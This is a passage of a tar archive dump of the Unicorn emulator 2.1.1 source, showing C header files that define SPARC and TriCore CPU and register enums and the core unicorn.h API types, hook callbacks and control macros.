UC_CPU_SPARC32_FUJITSU_MB86907, UC_CPU_SPARC32_TI_MICROSPARC_I, UC_CPU_SPARC32_TI_MICROSPARC_II, UC_CPU_SPARC32_TI_MICROSPARC_IIEP, UC_CPU_SPARC32_TI_SUPERSPARC_40, UC_CPU_SPARC32_TI_SUPERSPARC_50, UC_CPU_SPARC32_TI_SUPERSPARC_51, UC_CPU_SPARC32_TI_SUPERSPARC_60, UC_CPU_SPARC32_TI_SUPERSPARC_61, UC_CPU_SPARC32_TI_SUPERSPARC_II, UC_CPU_SPARC32_LEON2, UC_CPU_SPARC32_LEON3, UC_CPU_SPARC32_ENDING } uc_cpu_sparc32; //> SPARC64 CPU typedef enum uc_cpu_sparc64 { UC_CPU_SPARC64_FUJITSU = 0, UC_CPU_SPARC64_FUJITSU_III, UC_CPU_SPARC64_FUJITSU_IV, UC_CPU_SPARC64_FUJITSU_V, UC_CPU_SPARC64_TI_ULTRASPARC_I, UC_CPU_SPARC64_TI_ULTRASPARC_II, UC_CPU_SPARC64_TI_ULTRASPARC_III, UC_CPU_SPARC64_TI_ULTRASPARC_IIE, UC_CPU_SPARC64_SUN_ULTRASPARC_III, UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU, UC_CPU_SPARC64_SUN_ULTRASPARC_IIII, UC_CPU_SPARC64_SUN_ULTRASPARC_IV, UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS, UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS, UC_CPU_SPARC64_SUN_ULTRASPARC_T1, UC_CPU_SPARC64_SUN_ULTRASPARC_T2, UC_CPU_SPARC64_NEC_ULTRASPARC_I, UC_CPU_SPARC64_ENDING } uc_cpu_sparc64; //> SPARC registers typedef enum uc_sparc_reg { UC_SPARC_REG_INVALID = 0, UC_SPARC_REG_F0, UC_SPARC_REG_F1, UC_SPARC_REG_F2, UC_SPARC_REG_F3, UC_SPARC_REG_F4, UC_SPARC_REG_F5, UC_SPARC_REG_F6, UC_SPARC_REG_F7, UC_SPARC_REG_F8, UC_SPARC_REG_F9, UC_SPARC_REG_F10, UC_SPARC_REG_F11, UC_SPARC_REG_F12, UC_SPARC_REG_F13, UC_SPARC_REG_F14, UC_SPARC_REG_F15, UC_SPARC_REG_F16, UC_SPARC_REG_F17, UC_SPARC_REG_F18, UC_SPARC_REG_F19, UC_SPARC_REG_F20, UC_SPARC_REG_F21, UC_SPARC_REG_F22, UC_SPARC_REG_F23, UC_SPARC_REG_F24, UC_SPARC_REG_F25, UC_SPARC_REG_F26, UC_SPARC_REG_F27, UC_SPARC_REG_F28, UC_SPARC_REG_F29, UC_SPARC_REG_F30, UC_SPARC_REG_F31, UC_SPARC_REG_F32, UC_SPARC_REG_F34, UC_SPARC_REG_F36, UC_SPARC_REG_F38, UC_SPARC_REG_F40, UC_SPARC_REG_F42, UC_SPARC_REG_F44, UC_SPARC_REG_F46, UC_SPARC_REG_F48, UC_SPARC_REG_F50, UC_SPARC_REG_F52, UC_SPARC_REG_F54, UC_SPARC_REG_F56, UC_SPARC_REG_F58, UC_SPARC_REG_F60, UC_SPARC_REG_F62, UC_SPARC_REG_FCC0, // Floating condition codes UC_SPARC_REG_FCC1, UC_SPARC_REG_FCC2, UC_SPARC_REG_FCC3, UC_SPARC_REG_G0, UC_SPARC_REG_G1, UC_SPARC_REG_G2, UC_SPARC_REG_G3, UC_SPARC_REG_G4, UC_SPARC_REG_G5, UC_SPARC_REG_G6, UC_SPARC_REG_G7, UC_SPARC_REG_I0, UC_SPARC_REG_I1, UC_SPARC_REG_I2, UC_SPARC_REG_I3, UC_SPARC_REG_I4, UC_SPARC_REG_I5, UC_SPARC_REG_FP, UC_SPARC_REG_I7, UC_SPARC_REG_ICC, // Integer condition codes UC_SPARC_REG_L0, UC_SPARC_REG_L1, UC_SPARC_REG_L2, UC_SPARC_REG_L3, UC_SPARC_REG_L4, UC_SPARC_REG_L5, UC_SPARC_REG_L6, UC_SPARC_REG_L7, UC_SPARC_REG_O0, UC_SPARC_REG_O1, UC_SPARC_REG_O2, UC_SPARC_REG_O3, UC_SPARC_REG_O4, UC_SPARC_REG_O5, UC_SPARC_REG_SP, UC_SPARC_REG_O7, UC_SPARC_REG_Y, // special register UC_SPARC_REG_XCC, // pseudo register UC_SPARC_REG_PC, // program counter register UC_SPARC_REG_ENDING, // <-- mark the end of the list of registers // extras UC_SPARC_REG_O6 = UC_SPARC_REG_SP, UC_SPARC_REG_I6 = UC_SPARC_REG_FP, } uc_sparc_reg; #ifdef __cplusplus } #endif #endif ����������������������������������������������������������������unicorn-2.1.1/include/unicorn/tricore.h�������������������������������������������������������������0000664�0000000�0000000�00000007605�14675241067�0020134�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ /* Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #ifndef UNICORN_TRICORE_H #define UNICORN_TRICORE_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> TRICORE CPU typedef enum uc_cpu_tricore { UC_CPU_TRICORE_TC1796, UC_CPU_TRICORE_TC1797, UC_CPU_TRICORE_TC27X, UC_CPU_TRICORE_ENDING } uc_cpu_tricore; //> TRICORE registers typedef enum uc_tricore_reg { UC_TRICORE_REG_INVALID = 0, // General purpose registers (GPR) // Address GPR UC_TRICORE_REG_A0, UC_TRICORE_REG_A1, UC_TRICORE_REG_A2, UC_TRICORE_REG_A3, UC_TRICORE_REG_A4, UC_TRICORE_REG_A5, UC_TRICORE_REG_A6, UC_TRICORE_REG_A7, UC_TRICORE_REG_A8, UC_TRICORE_REG_A9, UC_TRICORE_REG_A10, UC_TRICORE_REG_A11, UC_TRICORE_REG_A12, UC_TRICORE_REG_A13, UC_TRICORE_REG_A14, UC_TRICORE_REG_A15, // Data GPR UC_TRICORE_REG_D0, UC_TRICORE_REG_D1, UC_TRICORE_REG_D2, UC_TRICORE_REG_D3, UC_TRICORE_REG_D4, UC_TRICORE_REG_D5, UC_TRICORE_REG_D6, UC_TRICORE_REG_D7, UC_TRICORE_REG_D8, UC_TRICORE_REG_D9, UC_TRICORE_REG_D10, UC_TRICORE_REG_D11, UC_TRICORE_REG_D12, UC_TRICORE_REG_D13, UC_TRICORE_REG_D14, UC_TRICORE_REG_D15, /* CSFR Register */ UC_TRICORE_REG_PCXI, UC_TRICORE_REG_PSW, /* PSW flag cache for faster execution */ UC_TRICORE_REG_PSW_USB_C, UC_TRICORE_REG_PSW_USB_V, UC_TRICORE_REG_PSW_USB_SV, UC_TRICORE_REG_PSW_USB_AV, UC_TRICORE_REG_PSW_USB_SAV, UC_TRICORE_REG_PC, UC_TRICORE_REG_SYSCON, UC_TRICORE_REG_CPU_ID, UC_TRICORE_REG_BIV, UC_TRICORE_REG_BTV, UC_TRICORE_REG_ISP, UC_TRICORE_REG_ICR, UC_TRICORE_REG_FCX, UC_TRICORE_REG_LCX, UC_TRICORE_REG_COMPAT, UC_TRICORE_REG_DPR0_U, UC_TRICORE_REG_DPR1_U, UC_TRICORE_REG_DPR2_U, UC_TRICORE_REG_DPR3_U, UC_TRICORE_REG_DPR0_L, UC_TRICORE_REG_DPR1_L, UC_TRICORE_REG_DPR2_L, UC_TRICORE_REG_DPR3_L, UC_TRICORE_REG_CPR0_U, UC_TRICORE_REG_CPR1_U, UC_TRICORE_REG_CPR2_U, UC_TRICORE_REG_CPR3_U, UC_TRICORE_REG_CPR0_L, UC_TRICORE_REG_CPR1_L, UC_TRICORE_REG_CPR2_L, UC_TRICORE_REG_CPR3_L, UC_TRICORE_REG_DPM0, UC_TRICORE_REG_DPM1, UC_TRICORE_REG_DPM2, UC_TRICORE_REG_DPM3, UC_TRICORE_REG_CPM0, UC_TRICORE_REG_CPM1, UC_TRICORE_REG_CPM2, UC_TRICORE_REG_CPM3, /* Memory Management Registers */ UC_TRICORE_REG_MMU_CON, UC_TRICORE_REG_MMU_ASI, UC_TRICORE_REG_MMU_TVA, UC_TRICORE_REG_MMU_TPA, UC_TRICORE_REG_MMU_TPX, UC_TRICORE_REG_MMU_TFA, // 1.3.1 Only UC_TRICORE_REG_BMACON, UC_TRICORE_REG_SMACON, UC_TRICORE_REG_DIEAR, UC_TRICORE_REG_DIETR, UC_TRICORE_REG_CCDIER, UC_TRICORE_REG_MIECON, UC_TRICORE_REG_PIEAR, UC_TRICORE_REG_PIETR, UC_TRICORE_REG_CCPIER, /* Debug Registers */ UC_TRICORE_REG_DBGSR, UC_TRICORE_REG_EXEVT, UC_TRICORE_REG_CREVT, UC_TRICORE_REG_SWEVT, UC_TRICORE_REG_TR0EVT, UC_TRICORE_REG_TR1EVT, UC_TRICORE_REG_DMS, UC_TRICORE_REG_DCX, UC_TRICORE_REG_DBGTCR, UC_TRICORE_REG_CCTRL, UC_TRICORE_REG_CCNT, UC_TRICORE_REG_ICNT, UC_TRICORE_REG_M1CNT, UC_TRICORE_REG_M2CNT, UC_TRICORE_REG_M3CNT, UC_TRICORE_REG_ENDING, // <-- mark the end of the list of registers // alias registers UC_TRICORE_REG_GA0 = UC_TRICORE_REG_A0, UC_TRICORE_REG_GA1 = UC_TRICORE_REG_A1, UC_TRICORE_REG_GA8 = UC_TRICORE_REG_A8, UC_TRICORE_REG_GA9 = UC_TRICORE_REG_A9, UC_TRICORE_REG_SP = UC_TRICORE_REG_A10, UC_TRICORE_REG_LR = UC_TRICORE_REG_A11, UC_TRICORE_REG_IA = UC_TRICORE_REG_A15, UC_TRICORE_REG_ID = UC_TRICORE_REG_D15, } uc_tricore_reg; #ifdef __cplusplus } #endif #endif���������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/unicorn.h�������������������������������������������������������������0000664�0000000�0000000�00000137310�14675241067�0020137�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_ENGINE_H #define UNICORN_ENGINE_H #ifdef __cplusplus extern "C" { #endif #include "platform.h" #include <stdarg.h> #if defined(UNICORN_HAS_OSXKERNEL) #include <libkern/libkern.h> #else #include <stdlib.h> #include <stdio.h> #endif struct uc_struct; typedef struct uc_struct uc_engine; typedef size_t uc_hook; #include "m68k.h" #include "x86.h" #include "arm.h" #include "arm64.h" #include "mips.h" #include "sparc.h" #include "ppc.h" #include "riscv.h" #include "s390x.h" #include "tricore.h" #ifdef __GNUC__ #define DEFAULT_VISIBILITY __attribute__((visibility("default"))) #else #define DEFAULT_VISIBILITY #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #pragma warning(disable : 4100) #ifdef UNICORN_SHARED #define UNICORN_EXPORT __declspec(dllexport) #else // defined(UNICORN_STATIC) #define UNICORN_EXPORT #endif #else #ifdef __GNUC__ #define UNICORN_EXPORT __attribute__((visibility("default"))) #else #define UNICORN_EXPORT #endif #endif #ifdef __GNUC__ #define UNICORN_DEPRECATED __attribute__((deprecated)) #elif defined(_MSC_VER) #define UNICORN_DEPRECATED __declspec(deprecated) #else #pragma message( \ "WARNING: You need to implement UNICORN_DEPRECATED for this compiler") #define UNICORN_DEPRECATED #endif // Unicorn API version #define UC_API_MAJOR 2 #define UC_API_MINOR 1 #define UC_API_PATCH 1 // Release candidate version, 255 means the official release. #define UC_API_EXTRA 255 // Unicorn package version #define UC_VERSION_MAJOR UC_API_MAJOR #define UC_VERSION_MINOR UC_API_MINOR #define UC_VERSION_PATCH UC_API_PATCH #define UC_VERSION_EXTRA UC_API_EXTRA /* Macro to create combined version which can be compared to result of uc_version() API. */ #define UC_MAKE_VERSION(major, minor) (((major) << 24) + ((minor) << 16)) // Scales to calculate timeout on microsecond unit // 1 second = 1000,000 microseconds #define UC_SECOND_SCALE 1000000 // 1 milisecond = 1000 nanoseconds #define UC_MILISECOND_SCALE 1000 // Architecture type typedef enum uc_arch { UC_ARCH_ARM = 1, // ARM architecture (including Thumb, Thumb-2) UC_ARCH_ARM64, // ARM-64, also called AArch64 UC_ARCH_MIPS, // Mips architecture UC_ARCH_X86, // X86 architecture (including x86 & x86-64) UC_ARCH_PPC, // PowerPC architecture UC_ARCH_SPARC, // Sparc architecture UC_ARCH_M68K, // M68K architecture UC_ARCH_RISCV, // RISCV architecture UC_ARCH_S390X, // S390X architecture UC_ARCH_TRICORE, // TriCore architecture UC_ARCH_MAX, } uc_arch; // Mode type typedef enum uc_mode { UC_MODE_LITTLE_ENDIAN = 0, // little-endian mode (default mode) UC_MODE_BIG_ENDIAN = 1 << 30, // big-endian mode // arm / arm64 UC_MODE_ARM = 0, // ARM mode UC_MODE_THUMB = 1 << 4, // THUMB mode (including Thumb-2) // Depreciated, use UC_ARM_CPU_* with uc_ctl instead. UC_MODE_MCLASS = 1 << 5, // ARM's Cortex-M series. UC_MODE_V8 = 1 << 6, // ARMv8 A32 encodings for ARM UC_MODE_ARMBE8 = 1 << 10, // Big-endian data and Little-endian code. // Legacy support for UC1 only. // arm (32bit) cpu types // Depreciated, use UC_ARM_CPU_* with uc_ctl instead. UC_MODE_ARM926 = 1 << 7, // ARM926 CPU type UC_MODE_ARM946 = 1 << 8, // ARM946 CPU type UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU type // mips UC_MODE_MICRO = 1 << 4, // MicroMips mode (currently unsupported) UC_MODE_MIPS3 = 1 << 5, // Mips III ISA (currently unsupported) UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (currently unsupported) UC_MODE_MIPS32 = 1 << 2, // Mips32 ISA UC_MODE_MIPS64 = 1 << 3, // Mips64 ISA // x86 / x64 UC_MODE_16 = 1 << 1, // 16-bit mode UC_MODE_32 = 1 << 2, // 32-bit mode UC_MODE_64 = 1 << 3, // 64-bit mode // ppc UC_MODE_PPC32 = 1 << 2, // 32-bit mode UC_MODE_PPC64 = 1 << 3, // 64-bit mode (currently unsupported) UC_MODE_QPX = 1 << 4, // Quad Processing eXtensions mode (currently unsupported) // sparc UC_MODE_SPARC32 = 1 << 2, // 32-bit mode UC_MODE_SPARC64 = 1 << 3, // 64-bit mode UC_MODE_V9 = 1 << 4, // SparcV9 mode (currently unsupported) // riscv UC_MODE_RISCV32 = 1 << 2, // 32-bit mode UC_MODE_RISCV64 = 1 << 3, // 64-bit mode // m68k } uc_mode; // All type of errors encountered by Unicorn API. // These are values returned by uc_errno() typedef enum uc_err { UC_ERR_OK = 0, // No error: everything was fine UC_ERR_NOMEM, // Out-Of-Memory error: uc_open(), uc_emulate() UC_ERR_ARCH, // Unsupported architecture: uc_open() UC_ERR_HANDLE, // Invalid handle UC_ERR_MODE, // Invalid/unsupported mode: uc_open() UC_ERR_VERSION, // Unsupported version (bindings) UC_ERR_READ_UNMAPPED, // Quit emulation due to READ on unmapped memory: // uc_emu_start() UC_ERR_WRITE_UNMAPPED, // Quit emulation due to WRITE on unmapped memory: // uc_emu_start() UC_ERR_FETCH_UNMAPPED, // Quit emulation due to FETCH on unmapped memory: // uc_emu_start() UC_ERR_HOOK, // Invalid hook type: uc_hook_add() UC_ERR_INSN_INVALID, // Quit emulation due to invalid instruction: // uc_emu_start() UC_ERR_MAP, // Invalid memory mapping: uc_mem_map() UC_ERR_WRITE_PROT, // Quit emulation due to UC_MEM_WRITE_PROT violation: // uc_emu_start() UC_ERR_READ_PROT, // Quit emulation due to UC_MEM_READ_PROT violation: // uc_emu_start() UC_ERR_FETCH_PROT, // Quit emulation due to UC_MEM_FETCH_PROT violation: // uc_emu_start() UC_ERR_ARG, // Inavalid argument provided to uc_xxx function (See specific // function API) UC_ERR_READ_UNALIGNED, // Unaligned read UC_ERR_WRITE_UNALIGNED, // Unaligned write UC_ERR_FETCH_UNALIGNED, // Unaligned fetch UC_ERR_HOOK_EXIST, // hook for this event already existed UC_ERR_RESOURCE, // Insufficient resource: uc_emu_start() UC_ERR_EXCEPTION, // Unhandled CPU exception UC_ERR_OVERFLOW, // Provided buffer is not large enough: uc_reg_*2() } uc_err; /* Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) @address: address where the code is being executed @size: size of machine instruction(s) being executed, or 0 when size is unknown @user_data: user data passed to tracing APIs. */ typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); /* Callback function for tracing interrupts (for uc_hook_intr()) @intno: interrupt number @user_data: user data passed to tracing APIs. */ typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); /* Callback function for tracing invalid instructions @user_data: user data passed to tracing APIs. @return: return true to continue, or false to stop program (due to invalid instruction). */ typedef bool (*uc_cb_hookinsn_invalid_t)(uc_engine *uc, void *user_data); /* Callback function for tracing IN instruction of X86 @port: port number @size: data size (1/2/4) to be read from this port @user_data: user data passed to tracing APIs. */ typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); /* Callback function for OUT instruction of X86 @port: port number @size: data size (1/2/4) to be written to this port @value: data value to be written to this port */ typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); typedef struct uc_tlb_entry uc_tlb_entry; // All type of memory accesses for UC_HOOK_MEM_* typedef enum uc_mem_type { UC_MEM_READ = 16, // Memory is read from UC_MEM_WRITE, // Memory is written to UC_MEM_FETCH, // Memory is fetched UC_MEM_READ_UNMAPPED, // Unmapped memory is read from UC_MEM_WRITE_UNMAPPED, // Unmapped memory is written to UC_MEM_FETCH_UNMAPPED, // Unmapped memory is fetched UC_MEM_WRITE_PROT, // Write to write protected, but mapped, memory UC_MEM_READ_PROT, // Read from read protected, but mapped, memory UC_MEM_FETCH_PROT, // Fetch from non-executable, but mapped, memory UC_MEM_READ_AFTER, // Memory is read from (successful access) } uc_mem_type; /* Callback function for tlb lookups @vaddr: virtuall address for lookup @rw: the access mode @result: result entry, contains physical address (paddr) and permitted access type (perms) for the entry @return: return true if the entry was found. If a callback is present but no one returns true a pagefault is generated. */ typedef bool (*uc_cb_tlbevent_t)(uc_engine *uc, uint64_t vaddr, uc_mem_type type, uc_tlb_entry *result, void *user_data); // Represent a TranslationBlock. typedef struct uc_tb { uint64_t pc; uint16_t icount; uint16_t size; } uc_tb; /* Callback function for new edges between translation blocks. @cur_tb: Current TB which is to be generated. @prev_tb: The previous TB. */ typedef void (*uc_hook_edge_gen_t)(uc_engine *uc, uc_tb *cur_tb, uc_tb *prev_tb, void *user_data); /* Callback function for tcg opcodes that fits in two arguments. @address: Current pc. @arg1: The first argument. @arg2: The second argument. */ typedef void (*uc_hook_tcg_op_2)(uc_engine *uc, uint64_t address, uint64_t arg1, uint64_t arg2, uint32_t size, void *user_data); typedef uc_hook_tcg_op_2 uc_hook_tcg_sub_t; /* Callback function for MMIO read @offset: offset to the base address of the IO memory. @size: data size to read @user_data: user data passed to uc_mmio_map() */ typedef uint64_t (*uc_cb_mmio_read_t)(uc_engine *uc, uint64_t offset, unsigned size, void *user_data); /* Callback function for MMIO write @offset: offset to the base address of the IO memory. @size: data size to write @value: data value to be written @user_data: user data passed to uc_mmio_map() */ typedef void (*uc_cb_mmio_write_t)(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data); // These are all op codes we support to hook for UC_HOOK_TCG_OP_CODE. // Be cautious since it may bring much more overhead than UC_HOOK_CODE without // proper flags. // TODO: Tracing UC_TCG_OP_CALL should be interesting. typedef enum uc_tcg_op_code { UC_TCG_OP_SUB = 0, // Both sub_i32 and sub_i64 } uc_tcg_op_code; // These are extra flags to be paired with uc_tcg_op_code which is helpful to // instrument in some certain cases. typedef enum uc_tcg_op_flag { // Only instrument opcode if it would set cc_dst, i.e. cmp instruction. UC_TCG_OP_FLAG_CMP = 1 << 0, // Only instrument opcode which is directly translated. // i.e. x86 sub/subc -> tcg sub_i32/64 UC_TCG_OP_FLAG_DIRECT = 1 << 1 } uc_tcg_op_flag; // All type of hooks for uc_hook_add() API. typedef enum uc_hook_type { // Hook all interrupt/syscall events UC_HOOK_INTR = 1 << 0, // Hook a particular instruction - only a very small subset of instructions // supported here UC_HOOK_INSN = 1 << 1, // Hook a range of code UC_HOOK_CODE = 1 << 2, // Hook basic blocks UC_HOOK_BLOCK = 1 << 3, // Hook for memory read on unmapped memory UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, // Hook for invalid memory write events UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, // Hook for invalid memory fetch for execution events UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, // Hook for memory read on read-protected memory UC_HOOK_MEM_READ_PROT = 1 << 7, // Hook for memory write on write-protected memory UC_HOOK_MEM_WRITE_PROT = 1 << 8, // Hook for memory fetch on non-executable memory UC_HOOK_MEM_FETCH_PROT = 1 << 9, // Hook memory read events. UC_HOOK_MEM_READ = 1 << 10, // Hook memory write events. UC_HOOK_MEM_WRITE = 1 << 11, // Hook memory fetch for execution events UC_HOOK_MEM_FETCH = 1 << 12, // Hook memory read events, but only successful access. // The callback will be triggered after successful read. UC_HOOK_MEM_READ_AFTER = 1 << 13, // Hook invalid instructions exceptions. UC_HOOK_INSN_INVALID = 1 << 14, // Hook on new edge generation. Could be useful in program analysis. // // NOTE: This is different from UC_HOOK_BLOCK in 2 ways: // 1. The hook is called before executing code. // 2. The hook is only called when generation is triggered. UC_HOOK_EDGE_GENERATED = 1 << 15, // Hook on specific tcg op code. The usage of this hook is similar to // UC_HOOK_INSN. UC_HOOK_TCG_OPCODE = 1 << 16, // Hook on tlb fill requests. // Register tlb fill request hook on the virtuall addresses. // The callback will be triggert if the tlb cache don't contain an address. UC_HOOK_TLB_FILL = 1 << 17, } uc_hook_type; // Hook type for all events of unmapped memory access #define UC_HOOK_MEM_UNMAPPED \ (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + \ UC_HOOK_MEM_FETCH_UNMAPPED) // Hook type for all events of illegal protected memory access #define UC_HOOK_MEM_PROT \ (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) // Hook type for all events of illegal read memory access #define UC_HOOK_MEM_READ_INVALID \ (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) // Hook type for all events of illegal write memory access #define UC_HOOK_MEM_WRITE_INVALID \ (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) // Hook type for all events of illegal fetch memory access #define UC_HOOK_MEM_FETCH_INVALID \ (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) // Hook type for all events of illegal memory access #define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) // Hook type for all events of valid memory access // NOTE: UC_HOOK_MEM_READ is triggered before UC_HOOK_MEM_READ_PROT and // UC_HOOK_MEM_READ_UNMAPPED, so // this hook may technically trigger on some invalid reads. #define UC_HOOK_MEM_VALID \ (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) /* Callback function for hooking memory (READ, WRITE & FETCH) @type: this memory is being READ, or WRITE @address: address where memory is being written or read to @size: size of data being read or written @value: value of data being written to memory, or irrelevant if type = READ. @user_data: user data passed to tracing APIs */ typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); /* Callback function for handling invalid memory access events (UNMAPPED and PROT events) @type: this memory is being READ, or WRITE @address: address where memory is being written or read to @size: size of data being read or written @value: value of data being written to memory, or irrelevant if type = READ. @user_data: user data passed to tracing APIs @return: return true to continue, or false to stop program (due to invalid memory). NOTE: returning true to continue execution will only work if the accessed memory is made accessible with the correct permissions during the hook. In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, the memory should be uc_mem_map()-ed with the correct permissions, and the instruction will then read or write to the address as it was supposed to. In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped in as executable, in which case execution will resume from the fetched address. The instruction pointer may be written to in order to change where execution resumes, but the fetch must succeed if execution is to resume. */ typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); /* Memory region mapped by uc_mem_map() and uc_mem_map_ptr() Retrieve the list of memory regions with uc_mem_regions() */ typedef struct uc_mem_region { uint64_t begin; // begin address of the region (inclusive) uint64_t end; // end address of the region (inclusive) uint32_t perms; // memory permissions of the region } uc_mem_region; // All type of queries for uc_query() API. typedef enum uc_query_type { // Dynamically query current hardware mode. UC_QUERY_MODE = 1, UC_QUERY_PAGE_SIZE, // query pagesize of engine UC_QUERY_ARCH, // query architecture of engine (for ARM to query Thumb mode) UC_QUERY_TIMEOUT, // query if emulation stops due to timeout (indicated if // result = True) } uc_query_type; // The implementation of uc_ctl is like what Linux ioctl does but slightly // different. // // A uc_control_type passed to uc_ctl is constructed as: // // R/W NR Reserved Type // [ ] [ ] [ ] [ ] // 31 30 29 26 25 16 15 0 // // @R/W: Whether the operation is a read or write access. // @NR: Number of arguments. // @Reserved: Should be zero, reserved for future extension. // @Type: Taken from uc_control_type enum. // // See the helper macros below. // No input and output arguments. #define UC_CTL_IO_NONE (0) // Only input arguments for a write operation. #define UC_CTL_IO_WRITE (1) // Only output arguments for a read operation. #define UC_CTL_IO_READ (2) // The arguments include both input and output arugments. #define UC_CTL_IO_READ_WRITE (UC_CTL_IO_WRITE | UC_CTL_IO_READ) #define UC_CTL(type, nr, rw) \ (uc_control_type)((type) | ((nr) << 26) | ((rw) << 30)) #define UC_CTL_NONE(type, nr) UC_CTL(type, nr, UC_CTL_IO_NONE) #define UC_CTL_READ(type, nr) UC_CTL(type, nr, UC_CTL_IO_READ) #define UC_CTL_WRITE(type, nr) UC_CTL(type, nr, UC_CTL_IO_WRITE) #define UC_CTL_READ_WRITE(type, nr) UC_CTL(type, nr, UC_CTL_IO_READ_WRITE) // unicorn tlb type selection typedef enum uc_tlb_type { // The default unicorn virtuall TLB implementation. // The tlb implementation of the CPU, best to use for full system emulation. UC_TLB_CPU = 0, // This tlb defaults to virtuall address == physical address // Also a hook is availible to override the tlb entries (see // uc_cb_tlbevent_t). UC_TLB_VIRTUAL } uc_tlb_type; // All type of controls for uc_ctl API. // The controls are organized in a tree level. // If a control don't have `Set` or `Get` for @args, it means it's r/o or w/o. typedef enum uc_control_type { // Current mode. // Read: @args = (int*) UC_CTL_UC_MODE = 0, // Curent page size. // Write: @args = (uint32_t) // Read: @args = (uint32_t*) UC_CTL_UC_PAGE_SIZE, // Current arch. // Read: @args = (int*) UC_CTL_UC_ARCH, // Current timeout. // Read: @args = (uint64_t*) UC_CTL_UC_TIMEOUT, // Enable multiple exits. // Without this control, reading/setting exits won't work. // This is for API backward compatibility. // Write: @args = (int) UC_CTL_UC_USE_EXITS, // The number of current exits. // Read: @args = (size_t*) UC_CTL_UC_EXITS_CNT, // Current exits. // Write: @args = (uint64_t* exits, size_t len) // @len = UC_CTL_UC_EXITS_CNT // Read: @args = (uint64_t* exits, size_t len) // @len = UC_CTL_UC_EXITS_CNT UC_CTL_UC_EXITS, // Set the cpu model of uc. // Note this option can only be set before any Unicorn // API is called except for uc_open. // Write: @args = (int) // Read: @args = (int*) UC_CTL_CPU_MODEL, // Request a tb cache at a specific address // Read: @args = (uint64_t, uc_tb*) UC_CTL_TB_REQUEST_CACHE, // Invalidate a tb cache at a specific address // Write: @args = (uint64_t, uint64_t) UC_CTL_TB_REMOVE_CACHE, // Invalidate all translation blocks. // No arguments. UC_CTL_TB_FLUSH, // Invalidate all TLB cache entries and translation blocks. // No arguments UC_CTL_TLB_FLUSH, // Change the tlb implementation // see uc_tlb_type for current implemented types // Write: @args = (int) UC_CTL_TLB_TYPE, // Change the tcg translation buffer size, note that // unicorn may adjust this value. // Write: @args = (uint32_t) // Read: @args = (uint32_t*) UC_CTL_TCG_BUFFER_SIZE, // controle if context_save/restore should work with snapshots // Write: @args = (int) UC_CTL_CONTEXT_MODE, } uc_control_type; /* Exits Mechanism In some cases, users may have multiple exits and the @until parameter of uc_emu_start is not sufficient to control the emulation. The exits mechanism is designed to solve this problem. Note that using hooks is aslo feasible, but the exits could be slightly more efficient and easy to implement. By default, the exits mechanism is disabled to keep backward compatibility. That is to say, calling uc_ctl_set/get_exits would return an error. Thus, to enable the exits firstly, call: uc_ctl_exits_enable(uc) After this call, the @until parameter of uc_emu_start would have no effect on the emulation, so: uc_emu_start(uc, 0x1000, 0 ...) uc_emu_start(uc, 0x1000, 0x1000 ...) uc_emu_start(uc, 0x1000, -1 ...) The three calls are totally equavelent since the @until is ignored. To setup the exits, users may call: uc_ctl_set/get_exits(uc, exits, len) For example, with an exits array [0x1000, 0x2000], uc_emu_start would stop at either 0x1000 and 0x2000. With an exits array [], uc_emu_start won't stop unless some hooks request a stop. If users would like to restore the default behavior of @until parameter, users may call: uc_ctl_exits_disable(uc) After that, all exits setup previously would be cleared and @until parameter would take effect again. See sample_ctl.c for a detailed example. */ #define uc_ctl_get_mode(uc, mode) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_MODE, 1), (mode)) #define uc_ctl_get_page_size(uc, ptr) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_PAGE_SIZE, 1), (ptr)) #define uc_ctl_set_page_size(uc, page_size) \ uc_ctl(uc, 